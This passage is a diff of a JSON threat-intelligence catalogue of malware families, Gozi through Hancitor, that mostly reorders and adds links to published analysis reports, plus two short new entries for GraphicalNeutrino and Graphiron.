- "https://lokalhost.pl/gozi_tree.txt",
- "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007",
- "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/",
+ "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
"https://www.secureworks.com/research/gozi",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance",
+ "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.youtube.com/watch?v=BcFbkjUVc7o",
+ "https://github.com/mlodic/ursnif_beacon_decryptor",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/",
+ "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007",
+ "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"CRM",
@@ -25152,10 +26623,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode",
- "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2",
- "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/",
"https://de.securelist.com/analysis/59479/erpresser/",
- "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html"
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2",
+ "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html",
+ "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/"
],
"synonyms": [],
"type": []
@@ -25194,10 +26665,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gramdoor",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
- "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html"
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf"
],
"synonyms": [
"Small Sieve"
@@ -25212,15 +26683,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season",
- "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
+ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
"https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season",
"https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks",
+ "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/",
+ "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf",
- "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/",
- "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/",
- "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/"
+ "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/"
],
"synonyms": [],
"type": []
@@ -25241,12 +26712,41 @@
"uuid": "626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14",
"value": "GrandSteal"
},
+ {
+ "description": "This loader abuses the benign service Notion for data exchange.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
+ "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cb92a200-b4f0-4983-8d5d-6bf529b66da9",
+ "value": "GraphicalNeutrino"
+ },
+ {
+ "description": "Downloader / information stealer used by UAC-0056, observed since at least October 2022.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphiron",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "968e330d-281e-4647-99fd-d9903aa6bbba",
+ "value": "Graphiron"
+ },
{
"description": "Trellix describes Graphite as a malware using the Microsoft Graph API and OneDrive for C&C. It was found being deployed in-memory only and served as a downloader for Empire.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite",
- "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html"
+ "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html",
+ "https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/"
],
"synonyms": [],
"type": []
@@ -25272,16 +26772,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://cert.gov.ua/article/38374",
- "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
- "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830",
"https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
+ "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://cert.gov.ua/article/38374",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830",
+ "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/"
],
"synonyms": [],
"type": []
@@ -25294,16 +26795,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos",
- "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html",
- "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/",
"https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/",
"http://www.secureworks.com/research/threat-profiles/gold-franklin",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season"
+ "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf",
+ "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season",
+ "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf",
+ "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html"
],
"synonyms": [
"FrameworkPOS",
@@ -25333,8 +26834,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat",
"https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/",
- "https://securelist.com/gravityrat-the-spy-returns/99097/",
"https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html",
+ "https://securelist.com/gravityrat-the-spy-returns/99097/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/"
],
"synonyms": [],
@@ -25348,6 +26849,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grease",
+ "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
"https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
],
"synonyms": [],
@@ -25376,15 +26879,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy",
- "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf",
"https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
- "https://attack.mitre.org/groups/G0034",
- "https://github.com/NozomiNetworks/greyenergy-unpacker",
"https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.eset.com/int/greyenergy-exposed/"
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://github.com/NozomiNetworks/greyenergy-unpacker",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf",
+ "https://www.eset.com/int/greyenergy-exposed/",
+ "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/",
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
@@ -25397,8 +26900,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2019",
- "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/"
+ "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2019"
],
"synonyms": [
"Hellsing Backdoor"
@@ -25413,10 +26916,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent",
- "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
- "https://blog.group-ib.com/grimagent",
"https://twitter.com/bryceabdo/status/1352359414746009608",
- "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer"
+ "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
+ "https://blog.group-ib.com/grimagent"
],
"synonyms": [],
"type": []
@@ -25429,17 +26932,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
+ "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://cert.gov.ua/article/38374",
"https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://cert.gov.ua/article/38374",
- "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/",
"https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830",
- "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/"
+ "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/"
],
"synonyms": [],
"type": []
@@ -25465,9 +26969,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt",
- "https://www.telsy.com/download/5776/?uid=aca91e397e",
"https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
"https://twitter.com/ItsReallyNick/status/1208141697282117633",
+ "https://www.telsy.com/download/5776/?uid=aca91e397e",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
"https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/"
],
"synonyms": [],
@@ -25507,8 +27012,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gwisin",
- "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf",
- "https://asec.ahnlab.com/en/37483"
+ "https://asec.ahnlab.com/en/37483",
+ "https://asec.ahnlab.com/en/41565/",
+ "https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf"
],
"synonyms": [],
"type": []
@@ -25534,8 +27040,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat",
- "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/",
- "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers"
+ "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers",
+ "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/"
],
"synonyms": [],
"type": []
@@ -25574,23 +27080,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hades",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
"https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://twitter.com/inversecos/status/1381477874046169089?s=20",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
"https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/",
- "http://www.secureworks.com/research/threat-profiles/gold-winter"
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://twitter.com/inversecos/status/1381477874046169089?s=20",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
+ "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/"
],
"synonyms": [],
"type": []
@@ -25603,26 +27109,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit",
- "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/",
- "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/",
- "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/",
- "https://unit42.paloaltonetworks.com/thanos-ransomware/",
- "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html",
- "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
- "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
- "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
- "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
- "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/",
- "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/",
- "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.justice.gov/usao-edny/press-release/file/1505981/download",
- "https://securelist.com/cis-ransomware/104452/"
+ "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html",
+ "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
+ "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
+ "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/",
+ "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
+ "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf",
+ "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
+ "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
+ "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/",
+ "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/",
+ "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/",
+ "https://unit42.paloaltonetworks.com/thanos-ransomware/"
],
"synonyms": [
"Thanos Ransomware"
@@ -25637,10 +27143,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq",
- "https://www.youtube.com/watch?v=JPvcLLYR0tE",
- "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf",
+ "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/",
"https://www.youtube.com/watch?v=FAFuSO9oAl0",
- "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/"
+ "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf",
+ "https://www.youtube.com/watch?v=JPvcLLYR0tE"
],
"synonyms": [],
"type": []
@@ -25653,62 +27159,53 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor",
- "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/",
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
- "https://twitter.com/TheDFIRReport/status/1359669513520873473",
"https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/",
- "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/",
- "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html",
- "https://muha2xmad.github.io/unpacking/hancitor/",
- "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
- "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
- "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
- "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
- "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/",
- "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure",
- "https://blog.group-ib.com/switching-side-jobs",
- "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8",
- "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb",
- "https://cyber-anubis.github.io/malware%20analysis/hancitor/",
- "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://isc.sans.edu/diary/rss/27618",
- "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity",
- "https://muha2xmad.github.io/malware-analysis/fullHancitor/",
- "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
- "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
"https://pid4.io/posts/how_to_write_a_hancitor_extractor/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/",
- "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
- "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
- "https://www.uperesia.com/hancitor-packer-demystified",
- "https://blog.group-ib.com/prometheus-tds",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/",
+ "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8",
"https://www.malware-traffic-analysis.net/2021/09/29/index.html",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping",
- "https://malware-traffic-analysis.net/2021/09/29/index.html",
- "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5",
"https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping",
+ "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
+ "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure",
+ "https://isc.sans.edu/diary/rss/27618",
+ "https://www.uperesia.com/hancitor-packer-demystified",
+ "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/",
+ "https://cyber-anubis.github.io/malware%20analysis/hancitor/",
+ "https://muha2xmad.github.io/malware-analysis/fullHancitor/",
